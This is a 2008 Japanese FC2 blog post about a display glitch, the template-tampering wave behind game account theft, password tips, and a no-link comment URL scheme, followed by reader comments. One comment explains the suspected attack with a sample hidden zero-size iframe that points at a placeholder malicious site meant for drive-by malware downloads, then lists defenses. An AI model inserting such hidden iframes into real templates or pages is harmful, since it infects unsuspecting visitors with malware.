fc2ブログ

テンプレ改ざんについてのお話

昨夜、「サモライ日記のブログのデザインが崩れている」
という通報があって、もしや!と思ったのですが、
巷で流行っているテンプレ改ざん事件とは
全く関係ありませんでした(´∀`)
 *いちおうたまに、テンプレート見るようにはしていましたw


どうやら昨日ブログデザインが崩れていたのは
文中に、長い半角文字列がある場合に起きる現象だったようです


そういや昨日の記事で、
******* のすごい長いのを書いてたから
それが原因だったらしい(;´ρ`)

Internet Explorerの場合だけデザイン崩れるんだけど、
私は最近、ウェブページはFireFoxでしか見てないので
まったく気づいていませんでした。

対策しといたから、
次からは大丈夫なハズですw


さてついでに、
いま流行ってる業者の活動について
少し触れときますかね…。




なんか最近のアカウントハックの手口は
感心するくらい巧妙になっているみたいです。






コレもうね、







個人で気をつけてどうにかなるレベルを、
はるかに超越しちゃってるよ!





いま問題になっている、
「ブログテンプレを改ざんして、
 ウィルスページを見えない状態で仕込む手法」
については有名になってきたので
気をつけてる人も多そうですが、

人間の知恵には限りがないもので、
いずれもっと巧妙な手口が出てくるにちがいないのですヽ(゜ー゜;)ノ

いや、もしかしたらもう
新しい手口で、FFユーザーのアカウントを狙っているかもしれない。


対策としては、
「FFやるPCではFF以外の事はやらない」
ってのが一番いいんだよねホントは(;´ρ`)


それができないにしても、
POLパスワードを自動保存しない設定
絶対にやっておくべきです。

パスワードを自分の覚えやすいものに変えて、
ちょっと面倒だけど、
毎回ログインのたびに、自分で入力するようにしましょう



たぶんコレにだけ気をつけておけば、
そうそうアカウント盗まれたりはしないはずです。

いちおう、キーボードからの入力情報を盗む手法もあるみたいなんですが、
それって不特定多数が相手のパス抜きには向かない方法だと思うので
たぶん業者は仕掛けてこないはず(´∀`)たぶん

なんにせよ、一度やられたら
すべてが終わってしまう事なので
できる限りの対策はとっておきましょう。




<コメント認証について>

最近、「コメント認証制にします」っていうブログが増えてるけど
これってコメント書いてくれる人にとっては
ちょっと不愉快なシステムなんだよね(;´ρ`)

せっかく書いたコメント、
すぐに反映されて表示してほしいもんw

てわけで、こいつのせいで
せっかくのコメント投稿者さんが減っちゃったブログさんも、
少なくないのではないでしょうか。

このコメント認証制、
私はあんまり良い方法だと思っていません。


というわけで、私が提案する新方式、
その名も
「リンクなしのURL表示方式」です!(´∀`)ノ


どんなもんかというと、

投稿者:サモライ
 URL ⇒ http://singenex.blog29.fc2.com/


みたいに、URLのテキスト表示はするんだけど
クリックでは飛ばないように表示するやり方のことです。
 *サンプルとして、この記事に自分のコメントつけとくので
   そっちも見てみてください

リンク先に行きたい人は
コピペしてアドレスバーに貼る手順を踏むことになるので、
飛ぶ前に確実にURLを見ることになります。

明らかに怪しいとこはURL見ればわかるし、
URL見てもわかんないようなのは
ブログ主にも判断つかないからなw

いちばんいいのは、
コメント書く人には全く負担にならない
という点です(*´д`*)

悪くないやり方だと思うんだけど、
どうなんでしょうかね(´∀`)



<やり方>

FC2の場合は、
テンプレートの編集のHTML編集のほうで

<%comment_url+str>

ってなってるトコを

<%comment_url>

に変えるだけで出来ます。

とってもカンタン^^

まあ、それだけだとURLがデレっと書かれるだけなので、
好みによって

URL: <%comment_url>

みたいに装飾してみるとか、
お好みでいじってみると楽しいでしょう

とゆーわけで、みなさま、
よいブログライフを(´∀`)ノ

スポンサーサイト



2008/03/19 03:14 | blogあれこれCOMMENT(6)TRACKBACK(0)  TOP

コメント

サンプル

【 サモライ 】
  2008/03/19 03:17 | URL(*'-') http://singenex.blog29.fc2.com/ [ 編集 ]

こんなカンジになります(´∀`)
――――――――――――――――――――

【 まんどれく 】
  2008/03/19 10:29 | URL(*'-')  [ 編集 ]

手口はどんどん悪どくなってるんだよねぇ
その労力を他にまわせwwと言いたいんだがw
これ以上酷くなるようだとどうにも対処出来なくなってくんだよね
正直閉鎖して消しちゃって
HPに戻した方が管理しやすいんじゃないか?とかねw


コメントはすぐ表示させれるといいんだけど
ウチには、コメントをすぐ出すか、コメントナシか
認証制しかないんだよねぇw
自前でテンプレを弄ればもしかしたら出来るかもだけどねw
――――――――――――――――――――

【 Silie 】
  2008/03/19 21:38 | URL(*'-') http://lspb.blog27.fc2.com/ [ 編集 ]

いつもお邪魔させていただいてますm(__)m
コメントは・・・・・・確か初だったと思いますが ^^;

うちも許可制にしたらほとんどコメント無くなっちゃったんで、
参考にさせていただいて、ちこっといじくってみようと思います。
――――――――――――――――――――

【 サモライ 】
  2008/03/20 06:18 | URL(*'-') http://singenex.blog29.fc2.com/ [ 編集 ]

<まんどさんへ>
これやってるヤツラは
ルールも何もないのが腹たつよねー

普通の良識があったら
やってはいけないレベルの事も
平気でやってくるからな…(;´ρ`)
*いや、中国の考え方では、アリなのかもしれないがw

テンプレ改造は
FC2とライブドアが
かなり自由度高いと言われているので、
他のトコだとできなかったりするかもw


<Silieさんへ>
おおう(*´д`*)はじめましてえー!!
まさかコレを参考にしてくれる方がいらっしゃるとはw

コメントが減ると、
ブログ書く気持ちも
だんだん衰えて行っちゃうから
困るんですよねえ

業者の妨害に負けずに、
楽しくブログ続けていく方法を
模索中です(´∀`)b

一緒にがんばりましょー!
今度Silieさんのブログにも
お邪魔させていただきますねw
――――――――――――――――――――

【 戦士M 】
  2008/03/22 23:56 | URL(*'-')  [ 編集 ]

こんにちわ~。
テンプレートが改ざんされたとされる事件について、僕の意見を書こうと思います。
以下のような事が起こったのではないかと推測します。

1.悪意あるユーザーが自作テンプレートの中に、iframeやJavaScriptを利用して、
悪意あるサイトへ自動でアクセスするような仕組みを作る。
ただし、このときに指定するURLはこの段階ではまだ無効なURLとする。
一例
<iframe src="http://www.malicious_site.com/malicious_page.html" width="0" height="0"></iframe>
(/malicious_page.htmlは、実在しないページ)

2.悪意あるユーザーがfc2のサイトへ自作したテンプレートを投稿する。

3.fc2のスタッフがマルウェア対策ソフトでテンプレートをチェックするが、URLが無効であるため、
マルウェアは決して検出されない。

4.テンプレートが公開され、多くのブログで使用される。

5.悪意あるユーザーがURL http://www.malicious_site.com/malicious_page.html を有効にする。
このURLにアクセスすると、マルウェアが強制的にダウンロードされるようにする。

6.件のテンプレートを使用したブログにアクセスしただけで、マルウェアに感染する。

以上の方法で嫌らしい点は、
サイトの管理人のパスワードが盗まれていようがいまいが関係ない所です。

サイト管理者の対策としては、

1.fc2社製以外のテンプレートを一切使わない

2.fc2社製以外のテンプレートを使う場合は、導入する前にテンプレートのソースコードを精査し、怪しげなiframeタグやJavaScriptを完全に排除してから使う。

ぐらいですかね。
ではでは。
――――――――――――――――――――

【 サモライ 】
  2008/03/25 03:26 | URL(*'-') http://singenex.blog29.fc2.com/ [ 編集 ]

<戦士Mさんへ>
その手法だと対処するのは簡単なんだけど、
今回騒ぎになってるのはもっとずっと悪質で、
何度も何度もテンプレートの改変をやってくるから
問題になってるんだよね(-_-;)

以前コメントいただいたコトある戦士スキーさんは
パスワード変えてもテンプレートいじられたみたいだし、
もうブログユーザーのレベルでは対処できない状況になってます。

そして昨夜、ついにフレが
アカハックくらう事態にまでなったので、
騒ぎが収まるまでは
FC2から避難しようかなーと検討中です…。

――――――――――――――――――――

コメントの投稿



管理者にだけ表示を許可する

 | BLOG TOP |